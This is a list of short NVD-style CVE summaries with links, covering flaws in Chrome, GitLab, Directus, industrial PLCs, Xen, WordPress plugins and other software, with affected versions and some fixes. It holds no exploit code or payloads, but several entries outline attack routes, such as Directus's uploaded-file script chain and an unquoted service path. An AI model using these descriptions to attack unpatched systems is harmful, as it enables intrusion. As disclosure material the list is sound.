CVE-2022-24814 Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 9.7.0, unauthorized JavaScript (JS) can be executed by inserting an iframe into the rich text html interface that links to a file uploaded HTML file that loads another uploaded JS file in its script tag. This satisfies the regular content security policy header, which in turn allows the file to run any arbitrary JS. This issue was resolved in version 9.7.0. As a workaround, disable the live embed in the what-you-see-is-what-you-get by adding `{ "media_live_embeds": false }` to the _Options Overrides_ option of the Rich Text HTML interface. https://nvd.nist.gov/vuln/detail/CVE-2022-24814
CVE-2022-25569 Bettini Srl GAMS Product Line v4.3.0 was discovered to re-use static SSH keys across installations, allowing unauthenticated attackers to login as root users via extracting a key from the software. https://nvd.nist.gov/vuln/detail/CVE-2022-25569
CVE-2022-26572 Xerox ColorQube 8580 was discovered to contain an access control issue which allows attackers to print, view the status, and obtain sensitive information. https://nvd.nist.gov/vuln/detail/CVE-2022-26572
CVE-2021-32977 AVEVA System Platform versions 2017 through 2020 R2 P01 does not verify, or incorrectly verifies, the cryptographic signature for data. https://nvd.nist.gov/vuln/detail/CVE-2021-32977
CVE-2021-32978 The programming protocol allows for a previously entered password and lock state to be read by an attacker. If the previously entered password was successful, the attacker can then use the password to unlock Automation Direct CLICK PLC CPU Modules: C0-1x CPUs with firmware prior to v3.00. https://nvd.nist.gov/vuln/detail/CVE-2021-32978
CVE-2021-32980 Automation Direct CLICK PLC CPU Modules: C0-1x CPUs with firmware prior to v3.00 does not protect against additional software programming connections. An attacker can connect to the PLC while an existing connection is already active. https://nvd.nist.gov/vuln/detail/CVE-2021-32980
CVE-2021-32981 AVEVA System Platform versions 2017 through 2020 R2 P01 uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the software does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. https://nvd.nist.gov/vuln/detail/CVE-2021-32981
CVE-2021-32982 Automation Direct CLICK PLC CPU Modules: C0-1x CPUs with firmware prior to v3.00 passwords are sent as plaintext during unlocking and project transfers. An attacker who has network visibility can observe the password exchange. https://nvd.nist.gov/vuln/detail/CVE-2021-32982
CVE-2021-32984 All programming connections receive the same unlocked privileges, which can result in a privilege escalation. During the time Automation Direct CLICK PLC CPU Modules: C0-1x CPUs with firmware prior to v3.00 is unlocked by an authorized user, an attacker can connect to the PLC and read the project without authorization. https://nvd.nist.gov/vuln/detail/CVE-2021-32984
CVE-2021-32985 AVEVA System Platform versions 2017 through 2020 R2 P01 does not properly verify that the source of data or communication is valid. https://nvd.nist.gov/vuln/detail/CVE-2021-32985
CVE-2021-32986 After Automation Direct CLICK PLC CPU Modules: C0-1x CPUs with firmware prior to v3.00 is unlocked by an authorized user, the unlocked state does not timeout. If the programming software is interrupted, the PLC remains unlocked. All subsequent programming connections are allowed without authorization. The PLC is only relocked by a power cycle, or when the programming software disconnects correctly. https://nvd.nist.gov/vuln/detail/CVE-2021-32986
CVE-2021-32994 Softing OPC UA C++ SDK (Software Development Kit) versions from 5.59 to 5.64 exported library functions don't properly validate received extension objects, which may allow an attacker to crash the software by sending a variety of specially crafted packets to access several unexpected memory locations. https://nvd.nist.gov/vuln/detail/CVE-2021-32994
CVE-2021-33008 AVEVA System Platform versions 2017 through 2020 R2 P01 does not perform any authentication for functionality that requires a provable user identity. https://nvd.nist.gov/vuln/detail/CVE-2021-33008
CVE-2021-33010 An exception is thrown from a function in AVEVA System Platform versions 2017 through 2020 R2 P01, but it is not caught, which may cause a denial-of-service condition. https://nvd.nist.gov/vuln/detail/CVE-2021-33010
CVE-2021-36826 Authenticated (subscriber or higher user role if allowed to access projects) Stored Cross-Site Scripting (XSS) vulnerability in weDevs WP Project Manager (WordPress plugin) versions <= 2.4.13. https://nvd.nist.gov/vuln/detail/CVE-2021-36826
CVE-2021-36851 Authenticated (editor or higher user role) Cross-Site Scripting (XSS) vulnerability in Web-Settler Testimonial Slider – Free Testimonials Slider Plugin (WordPress plugin) via parameters mpsp_posts_bg_color, mpsp_posts_description_color, mpsp_slide_nav_button_color. https://nvd.nist.gov/vuln/detail/CVE-2021-36851
CVE-2022-0740 Incorrect authorization in the Asana integration's branch restriction feature in all versions of GitLab CE/EE starting from version 7.8.0 before 14.7.7, all versions starting from 14.8 before 14.8.5, all versions starting from 14.9 before 14.9.2 makes it possible to close Asana tasks from unrestricted branches. https://nvd.nist.gov/vuln/detail/CVE-2022-0740
CVE-2022-1099 Adding a very large number of tags to a runner in GitLab CE/EE affecting all versions prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2 allows an attacker to impact the performance of GitLab https://nvd.nist.gov/vuln/detail/CVE-2022-1099
CVE-2022-1100 A potential DOS vulnerability was discovered in GitLab CE/EE affecting all versions from 13.1 prior to 14.7.7, 14.8.0 prior to 14.8.5, and 14.9.0 prior to 14.9.2. The api to update an asset as a link from a release had a regex check which caused exponential number of backtracks for certain user supplied values resulting in high CPU usage. https://nvd.nist.gov/vuln/detail/CVE-2022-1100
CVE-2022-1105 An improper access control vulnerability in GitLab CE/EE affecting all versions from 13.11 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2 allows an unauthorized user to access pipeline analytics even when public pipelines are disabled https://nvd.nist.gov/vuln/detail/CVE-2022-1105
CVE-2022-1111 A business logic error in Project Import in GitLab CE/EE versions 14.9 prior to 14.9.2, 14.8 prior to 14.8.5, and 14.0 prior to 14.7.7 under certain conditions caused imported projects to show an incorrect user in the 'Access Granted' column in the project membership pages https://nvd.nist.gov/vuln/detail/CVE-2022-1111
CVE-2022-1120 Missing filtering in an error message in GitLab CE/EE affecting all versions prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2 exposed sensitive information when an include directive fails in the CI/CD configuration. https://nvd.nist.gov/vuln/detail/CVE-2022-1120
CVE-2022-1121 A lack of appropriate timeouts in GitLab Pages included in GitLab CE/EE all versions prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2 allows an attacker to cause unlimited resource consumption. https://nvd.nist.gov/vuln/detail/CVE-2022-1121
CVE-2022-1148 Improper authorization in GitLab Pages included with GitLab CE/EE affecting all versions from 11.5 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2 allowed an attacker to steal a user's access token on an attacker-controlled private GitLab Pages website and reuse that token on the victim's other private websites https://nvd.nist.gov/vuln/detail/CVE-2022-1148
CVE-2022-1162 A hardcoded password was set for accounts registered using an OmniAuth provider (e.g. OAuth, LDAP, SAML) in GitLab CE/EE versions 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2 allowing attackers to potentially take over accounts https://nvd.nist.gov/vuln/detail/CVE-2022-1162
CVE-2022-1174 A potential DoS vulnerability was discovered in Gitlab CE/EE versions 13.7 before 14.7.7, all versions starting from 14.8 before 14.8.5, all versions starting from 14.9 before 14.9.2 allowed an attacker to trigger high CPU usage via a special crafted input added in Issues, Merge requests, Milestones, Snippets, Wiki pages, etc. https://nvd.nist.gov/vuln/detail/CVE-2022-1174
CVE-2022-1175 Improper neutralization of user input in GitLab CE/EE versions 14.4 before 14.7.7, all versions starting from 14.8 before 14.8.5, all versions starting from 14.9 before 14.9.2 allowed an attacker to exploit XSS by injecting HTML in notes. https://nvd.nist.gov/vuln/detail/CVE-2022-1175
CVE-2022-1185 A denial of service vulnerability when rendering RDoc files in GitLab CE/EE versions 10 to 14.7.7, 14.8.0 to 14.8.5, and 14.9.0 to 14.9.2 allows an attacker to crash the GitLab web application with a maliciously crafted RDoc file https://nvd.nist.gov/vuln/detail/CVE-2022-1185
CVE-2022-1188 An issue has been discovered in GitLab CE/EE affecting all versions starting from 12.1 before 14.7.7, all versions starting from 14.8 before 14.8.5, all versions starting from 14.9 before 14.9.2 where a blind SSRF attack through the repository mirroring feature was possible. https://nvd.nist.gov/vuln/detail/CVE-2022-1188
CVE-2022-1189 An issue has been discovered in GitLab CE/EE affecting all versions starting from 12.2 before 14.7.7, all versions starting from 14.8 before 14.8.5, all versions starting from 14.9 before 14.9.2 that allowed for an unauthorised user to read the the approval rules of a private project. https://nvd.nist.gov/vuln/detail/CVE-2022-1189
CVE-2022-1190 Improper handling of user input in GitLab CE/EE versions 8.3 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2 allowed an attacker to exploit a stored XSS by abusing multi-word milestone references in issue descriptions, comments, etc. https://nvd.nist.gov/vuln/detail/CVE-2022-1190
CVE-2022-1233 URL Confusion When Scheme Not Supplied in GitHub repository medialize/uri.js prior to 1.19.11. https://nvd.nist.gov/vuln/detail/CVE-2022-1233
CVE-2022-23697 A remote cross-site scripting (xss) vulnerability was discovered in HPE OneView version(s): Prior to 6.6. HPE has provided a software update to resolve this vulnerability in HPE OneView. https://nvd.nist.gov/vuln/detail/CVE-2022-23697
CVE-2022-23698 A remote unauthenticated disclosure of information vulnerability was discovered in HPE OneView version(s): Prior to 6.6. HPE has provided a software update to resolve this vulnerability in HPE OneView. https://nvd.nist.gov/vuln/detail/CVE-2022-23698
CVE-2022-23699 A local authentication restriction bypass vulnerability was discovered in HPE OneView version(s): Prior to 6.6. HPE has provided a software update to resolve this vulnerability in HPE OneView. https://nvd.nist.gov/vuln/detail/CVE-2022-23699
CVE-2022-23700 A local unauthorized read access to files vulnerability was discovered in HPE OneView version(s): Prior to 6.6. HPE has provided a software update to resolve this vulnerability in HPE OneView. https://nvd.nist.gov/vuln/detail/CVE-2022-23700
CVE-2022-25613 Authenticated Persistent Cross-Site Scripting (XSS) vulnerability in FV Flowplayer Video Player (WordPress plugin) versions <= 7.5.18.727 via &fv_wp_flowplayer_field_splash parameter. https://nvd.nist.gov/vuln/detail/CVE-2022-25613
CVE-2022-25618 Authenticated (admin+) Stored Cross-Site Scripting (XSS) vulnerability in wpDataTables (WordPress plugin) versions <= 2.1.27 https://nvd.nist.gov/vuln/detail/CVE-2022-25618
CVE-2022-27608 Forcepoint One Endpoint prior to version 22.01 installed on Microsoft Windows is vulnerable to registry key tampering by users with Administrator privileges. This could result in a user disabling anti-tampering mechanisms which would then allow the user to disable Forcepoint One Endpoint and the protection offered by it. https://nvd.nist.gov/vuln/detail/CVE-2022-27608
CVE-2022-27609 Forcepoint One Endpoint prior to version 22.01 installed on Microsoft Windows does not provide sufficient anti-tampering protection of services by users with Administrator privileges. This could result in a user disabling Forcepoint One Endpoint and the protection offered by it. https://nvd.nist.gov/vuln/detail/CVE-2022-27609
CVE-2022-27649 A flaw was found in Podman, where containers were started incorrectly with non-empty default permissions. A vulnerability was found in Moby (Docker Engine), where containers were started incorrectly with non-empty inheritable Linux process capabilities. This flaw allows an attacker with access to programs with inheritable file capabilities to elevate those capabilities to the permitted set when execve(2) runs. https://nvd.nist.gov/vuln/detail/CVE-2022-27649
CVE-2022-27650 A flaw was found in crun where containers were incorrectly started with non-empty default permissions. A vulnerability was found in Moby (Docker Engine) where containers were started incorrectly with non-empty inheritable Linux process capabilities. This flaw allows an attacker with access to programs with inheritable file capabilities to elevate those capabilities to the permitted set when execve(2) runs. https://nvd.nist.gov/vuln/detail/CVE-2022-27650
CVE-2022-27651 A flaw was found in buildah where containers were incorrectly started with non-empty default permissions. A bug was found in Moby (Docker Engine) where containers were incorrectly started with non-empty inheritable Linux process capabilities, enabling an attacker with access to programs with inheritable file capabilities to elevate those capabilities to the permitted set when execve(2) runs. This has the potential to impact confidentiality and integrity. https://nvd.nist.gov/vuln/detail/CVE-2022-27651
CVE-2022-27441 A stored cross-site scripting (XSS) vulnerability in TPCMS v3.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Phone text box. https://nvd.nist.gov/vuln/detail/CVE-2022-27441
CVE-2022-27442 TPCMS v3.2 allows attackers to access the ThinkPHP log directory and obtain sensitive information such as the administrator's user name and password. https://nvd.nist.gov/vuln/detail/CVE-2022-27442
CVE-2022-0603 Use after free in File Manager in Google Chrome on Chrome OS prior to 98.0.4758.102 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0603
CVE-2022-0604 Heap buffer overflow in Tab Groups in Google Chrome prior to 98.0.4758.102 allowed an attacker who convinced a user to install a malicious extension and engage in specific user interaction to potentially exploit heap corruption via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0604
CVE-2022-0605 Use after free in Webstore API in Google Chrome prior to 98.0.4758.102 allowed an attacker who convinced a user to install a malicious extension and convinced a user to enage in specific user interaction to potentially exploit heap corruption via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0605
CVE-2022-0606 Use after free in ANGLE in Google Chrome prior to 98.0.4758.102 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0606
CVE-2022-0607 Use after free in GPU in Google Chrome prior to 98.0.4758.102 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0607
CVE-2022-0608 Integer overflow in Mojo in Google Chrome prior to 98.0.4758.102 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0608
CVE-2022-0609 Use after free in Animation in Google Chrome prior to 98.0.4758.102 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0609
CVE-2022-0610 Inappropriate implementation in Gamepad API in Google Chrome prior to 98.0.4758.102 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0610
CVE-2022-23732 A path traversal vulnerability was identified in GitHub Enterprise Server management console that allowed the bypass of CSRF protections. This could potentially lead to privilege escalation. To exploit this vulnerability, an attacker would need to target a user that was actively logged into the management console. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.5 and was fixed in versions 3.1.19, 3.2.11, 3.3.6, 3.4.1. This vulnerability was reported via the GitHub Bug Bounty program. https://nvd.nist.gov/vuln/detail/CVE-2022-23732
CVE-2021-45894 An issue was discovered in Softwarebuero Zauner ARC 4.2.0.4. There is Cleartext Transmission of Sensitive Information. https://nvd.nist.gov/vuln/detail/CVE-2021-45894
CVE-2022-0452 Use after free in Safe Browsing in Google Chrome prior to 98.0.4758.80 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0452
CVE-2022-0453 Use after free in Reader Mode in Google Chrome prior to 98.0.4758.80 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0453
CVE-2022-0454 Heap buffer overflow in ANGLE in Google Chrome prior to 98.0.4758.80 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0454
CVE-2022-0455 Inappropriate implementation in Full Screen Mode in Google Chrome on Android prior to 98.0.4758.80 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0455
CVE-2022-0456 Use after free in Web Search in Google Chrome prior to 98.0.4758.80 allowed a remote attacker to potentially exploit heap corruption via profile destruction. https://nvd.nist.gov/vuln/detail/CVE-2022-0456
CVE-2022-0457 Type confusion in V8 in Google Chrome prior to 98.0.4758.80 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0457
CVE-2022-0458 Use after free in Thumbnail Tab Strip in Google Chrome prior to 98.0.4758.80 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0458
CVE-2022-0459 Use after free in Screen Capture in Google Chrome prior to 98.0.4758.80 allowed a remote attacker who had compromised the renderer process and convinced a user to engage in specific user interaction to potentially exploit heap corruption via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0459
CVE-2022-0460 Use after free in Window Dialogue in Google Chrome prior to 98.0.4758.80 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0460
CVE-2022-0461 Policy bypass in COOP in Google Chrome prior to 98.0.4758.80 allowed a remote attacker to bypass iframe sandbox via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0461
CVE-2022-0462 Inappropriate implementation in Scroll in Google Chrome prior to 98.0.4758.80 allowed a remote attacker to leak cross-origin data via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0462
CVE-2022-0463 Use after free in Accessibility in Google Chrome prior to 98.0.4758.80 allowed a remote attacker who convinced a user to engage in specific user interaction to potentially exploit heap corruption via user interaction. https://nvd.nist.gov/vuln/detail/CVE-2022-0463
CVE-2022-0464 Use after free in Accessibility in Google Chrome prior to 98.0.4758.80 allowed a remote attacker who convinced a user to engage in specific user interaction to potentially exploit heap corruption via user interaction. https://nvd.nist.gov/vuln/detail/CVE-2022-0464
CVE-2022-0465 Use after free in Extensions in Google Chrome prior to 98.0.4758.80 allowed a remote attacker to potentially exploit heap corruption via user interaction. https://nvd.nist.gov/vuln/detail/CVE-2022-0465
CVE-2022-0466 Inappropriate implementation in Extensions Platform in Google Chrome prior to 98.0.4758.80 allowed an attacker who convinced a user to install a malicious extension to potentially perform a sandbox escape via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0466
CVE-2022-0467 Inappropriate implementation in Pointer Lock in Google Chrome on Windows prior to 98.0.4758.80 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0467
CVE-2022-0468 Use after free in Payments in Google Chrome prior to 98.0.4758.80 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0468
CVE-2022-0469 Use after free in Cast in Google Chrome prior to 98.0.4758.80 allowed a remote attacker who convinced a user to engage in specific interactions to potentially exploit heap corruption via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0469
CVE-2022-0470 Out of bounds memory access in V8 in Google Chrome prior to 98.0.4758.80 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0470
CVE-2022-0789 Heap buffer overflow in ANGLE in Google Chrome prior to 99.0.4844.51 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0789
CVE-2022-0790 Use after free in Cast UI in Google Chrome prior to 99.0.4844.51 allowed a remote attacker who convinced a user to engage in specific user interaction to potentially perform a sandbox escape via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0790
CVE-2022-0791 Use after free in Omnibox in Google Chrome prior to 99.0.4844.51 allowed a remote attacker who convinced a user to engage in specific user interactions to potentially exploit heap corruption via user interactions. https://nvd.nist.gov/vuln/detail/CVE-2022-0791
CVE-2022-0792 Out of bounds read in ANGLE in Google Chrome prior to 99.0.4844.51 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0792
CVE-2022-0793 Use after free in Cast in Google Chrome prior to 99.0.4844.51 allowed an attacker who convinced a user to install a malicious extension and engage in specific user interaction to potentially exploit heap corruption via a crafted Chrome Extension. https://nvd.nist.gov/vuln/detail/CVE-2022-0793
CVE-2022-0794 Use after free in WebShare in Google Chrome prior to 99.0.4844.51 allowed a remote attacker who convinced a user to engage in specific user interaction to potentially exploit heap corruption via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0794
CVE-2022-0795 Type confusion in Blink Layout in Google Chrome prior to 99.0.4844.51 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0795
CVE-2022-0796 Use after free in Media in Google Chrome prior to 99.0.4844.51 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0796
CVE-2022-0797 Out of bounds memory access in Mojo in Google Chrome prior to 99.0.4844.51 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0797
CVE-2022-0798 Use after free in MediaStream in Google Chrome prior to 99.0.4844.51 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted Chrome Extension. https://nvd.nist.gov/vuln/detail/CVE-2022-0798
CVE-2022-0799 Insufficient policy enforcement in Installer in Google Chrome on Windows prior to 99.0.4844.51 allowed a remote attacker to perform local privilege escalation via a crafted offline installer file. https://nvd.nist.gov/vuln/detail/CVE-2022-0799
CVE-2022-0800 Heap buffer overflow in Cast UI in Google Chrome prior to 99.0.4844.51 allowed a remote attacker who convinced a user to engage in specific user interaction to potentially exploit heap corruption via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0800
CVE-2022-0802 Inappropriate implementation in Full screen mode in Google Chrome on Android prior to 99.0.4844.51 allowed a remote attacker to hide the contents of the Omnibox (URL bar) via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0802
CVE-2022-0803 Inappropriate implementation in Permissions in Google Chrome prior to 99.0.4844.51 allowed a remote attacker to tamper with the contents of the Omnibox (URL bar) via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0803
CVE-2022-0804 Inappropriate implementation in Full screen mode in Google Chrome on Android prior to 99.0.4844.51 allowed a remote attacker to hide the contents of the Omnibox (URL bar) via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0804
CVE-2022-0805 Use after free in Browser Switcher in Google Chrome prior to 99.0.4844.51 allowed a remote attacker who convinced a user to engage in specific user interaction to potentially exploit heap corruption via user interaction. https://nvd.nist.gov/vuln/detail/CVE-2022-0805
CVE-2022-0806 Data leak in Canvas in Google Chrome prior to 99.0.4844.51 allowed a remote attacker who convinced a user to engage in screen sharing to potentially leak cross-origin data via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0806
CVE-2022-0807 Inappropriate implementation in Autofill in Google Chrome prior to 99.0.4844.51 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0807
CVE-2022-0808 Use after free in Chrome OS Shell in Google Chrome on Chrome OS prior to 99.0.4844.51 allowed a remote attacker who convinced a user to engage in a series of user interaction to potentially exploit heap corruption via user interactions. https://nvd.nist.gov/vuln/detail/CVE-2022-0808
CVE-2022-0809 Out of bounds memory access in WebXR in Google Chrome prior to 99.0.4844.51 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. https://nvd.nist.gov/vuln/detail/CVE-2022-0809
CVE-2022-25584 Seyeon Tech Co., Ltd FlexWATCH FW3170-PS-E Network Video System 4.23-3000_GY allows attackers to access sensitive information. https://nvd.nist.gov/vuln/detail/CVE-2022-25584
CVE-2022-26585 Mingsoft MCMS v5.2.7 was discovered to contain a SQL injection vulnerability via /cms/content/list. https://nvd.nist.gov/vuln/detail/CVE-2022-26585
CVE-2022-26619 Halo Blog CMS v1.4.17 was discovered to allow attackers to upload arbitrary files via the Attachment Upload function. https://nvd.nist.gov/vuln/detail/CVE-2022-26619
CVE-2021-42324 An issue was discovered on DCN (Digital China Networks) S4600-10P-SI devices before R0241.0470. Due to improper parameter validation in the console interface, it is possible for a low-privileged authenticated attacker to escape the sandbox environment and execute system commands as root via shell metacharacters in the capture command parameters. Command output will be shown on the Serial interface of the device. Exploitation requires both credentials and physical access. https://nvd.nist.gov/vuln/detail/CVE-2021-42324
CVE-2021-43008 Improper Access Control in Adminer versions 1.12.0 to 4.6.2 (fixed in version 4.6.3) allows an attacker to achieve Arbitrary File Read on the remote server by requesting the Adminer to connect to a remote MySQL database. https://nvd.nist.gov/vuln/detail/CVE-2021-43008
CVE-2021-44108 A null pointer dereference in src/amf/namf-handler.c in Open5GS 2.3.6 and earlier allows remote attackers to Denial of Service via a crafted sbi request to amf. https://nvd.nist.gov/vuln/detail/CVE-2021-44108
CVE-2021-44109 A buffer overflow in lib/sbi/message.c in Open5GS 2.3.6 and earlier allows remote attackers to Denial of Service via a crafted sbi request. https://nvd.nist.gov/vuln/detail/CVE-2021-44109
CVE-2021-45891 An issue was discovered in Softwarebuero Zauner ARC 4.2.0.4., that allows attackers to escalate privileges within the application, since all permission checks are done client-side, not server-side. https://nvd.nist.gov/vuln/detail/CVE-2021-45891
CVE-2021-45892 An issue was discovered in Softwarebuero Zauner ARC 4.2.0.4. There is storage of Passwords in a Recoverable Format. https://nvd.nist.gov/vuln/detail/CVE-2021-45892
CVE-2021-45893 An issue was discovered in Softwarebuero Zauner ARC 4.2.0.4. There is Improper Handling of Case Sensitivity, which makes password guessing easier. https://nvd.nist.gov/vuln/detail/CVE-2021-45893
CVE-2022-24231 Simple Student Information System v1.0 was discovered to contain a SQL injection vulnerability via add/Student. https://nvd.nist.gov/vuln/detail/CVE-2022-24231
CVE-2022-25356 ALIN MDaemon Security Gateway through 8.5.0 allows XML Injection. https://nvd.nist.gov/vuln/detail/CVE-2022-25356
CVE-2022-26281 BigAnt Server v5.6.06 was discovered to contain an incorrect access control issue. https://nvd.nist.gov/vuln/detail/CVE-2022-26281
CVE-2022-26615 A cross-site scripting (XSS) vulnerability in College Website Content Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the User Profile Name text fields. https://nvd.nist.gov/vuln/detail/CVE-2022-26615
CVE-2021-33207 The HTTP client in MashZone NextGen through 10.7 GA deserializes untrusted data when it gets an HTTP response with a 570 status code. https://nvd.nist.gov/vuln/detail/CVE-2021-33207
CVE-2021-39114 Affected versions of Atlassian Confluence Server and Data Center allow users with a valid account on a Confluence Data Center instance to execute arbitrary Java code or run arbitrary system commands by injecting an OGNL payload. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5. https://nvd.nist.gov/vuln/detail/CVE-2021-39114
CVE-2022-1212 Use-After-Free in str_escape in mruby/mruby in GitHub repository mruby/mruby prior to 3.2. Possible arbitrary code execution if being exploited. https://nvd.nist.gov/vuln/detail/CVE-2022-1212
CVE-2022-1213 SSRF filter bypass port 80, 433 in GitHub repository livehelperchat/livehelperchat prior to 3.67v. An attacker could make the application perform arbitrary requests, bypass CVE-2022-1191 https://nvd.nist.gov/vuln/detail/CVE-2022-1213
CVE-2022-23909 There is an unquoted service path in Sherpa Connector Service (SherpaConnectorService.exe) 2020.2.20328.2050. This might allow a local user to escalate privileges by creating a "C:\\Program Files\\Sherpa Software\\Sherpa.exe" file. https://nvd.nist.gov/vuln/detail/CVE-2022-23909
CVE-2022-25154 A DLL hijacking vulnerability in Samsung portable SSD T5 PC software before 1.6.9 could allow a local attacker to escalate privileges. (An attacker must already have user privileges on Windows 7, 10, or 11 to exploit this vulnerability.) https://nvd.nist.gov/vuln/detail/CVE-2022-25154
CVE-2022-1235 Weak secrethash can be brute-forced in GitHub repository livehelperchat/livehelperchat prior to 3.96. https://nvd.nist.gov/vuln/detail/CVE-2022-1235
CVE-2022-1236 Weak Password Requirements in GitHub repository weseek/growi prior to v5.0.0. https://nvd.nist.gov/vuln/detail/CVE-2022-1236
CVE-2021-38834 easy-mock v1.5.0-v1.6.0 allows remote attackers to bypass the vm2 sandbox and execute arbitrary system commands through special js code. https://nvd.nist.gov/vuln/detail/CVE-2021-38834
CVE-2022-26356 Racy interactions between dirty vram tracking and paging log dirty hypercalls Activation of log dirty mode done by XEN_DMOP_track_dirty_vram (was named HVMOP_track_dirty_vram before Xen 4.9) is racy with ongoing log dirty hypercalls. A suitably timed call to XEN_DMOP_track_dirty_vram can enable log dirty while another CPU is still in the process of tearing down the structures related to a previously enabled log dirty mode (XEN_DOMCTL_SHADOW_OP_OFF). This is due to lack of mutually exclusive locking between both operations and can lead to entries being added in already freed slots, resulting in a memory leak. https://nvd.nist.gov/vuln/detail/CVE-2022-26356
CVE-2022-26357 race in VT-d domain ID cleanup Xen domain IDs are up to 15 bits wide. VT-d hardware may allow for only less than 15 bits to hold a domain ID associating a physical device with a particular domain. Therefore internally Xen domain IDs are mapped to the smaller value range. The cleaning up of the housekeeping structures has a race, allowing for VT-d domain IDs to be leaked and flushes to be bypassed. https://nvd.nist.gov/vuln/detail/CVE-2022-26357
CVE-2022-26358 IOMMU: RMRR (VT-d) and unity map (AMD-Vi) handling issues T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] Certain PCI devices in a system might be assigned Reserved Memory Regions (specified via Reserved Memory Region Reporting, "RMRR") for Intel VT-d or Unity Mapping ranges for AMD-Vi. These are typically used for platform tasks such as legacy USB emulation. Since the precise purpose of these regions is unknown, once a device associated with such a region is active, the mappings of these regions need to remain continuouly accessible by the device. This requirement has been violated. Subsequent DMA or interrupts from the device may have unpredictable behaviour, ranging from IOMMU faults to memory corruption. https://nvd.nist.gov/vuln/detail/CVE-2022-26358
CVE-2022-26359 IOMMU: RMRR (VT-d) and unity map (AMD-Vi) handling issues T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] Certain PCI devices in a system might be assigned Reserved Memory Regions (specified via Reserved Memory Region Reporting, "RMRR") for Intel VT-d or Unity Mapping ranges for AMD-Vi. These are typically used for platform tasks such as legacy USB emulation. Since the precise purpose of these regions is unknown, once a device associated with such a region is active, the mappings of these regions need to remain continuouly accessible by the device. This requirement has been violated. Subsequent DMA or interrupts from the device may have unpredictable behaviour, ranging from IOMMU faults to memory corruption. https://nvd.nist.gov/vuln/detail/CVE-2022-26359
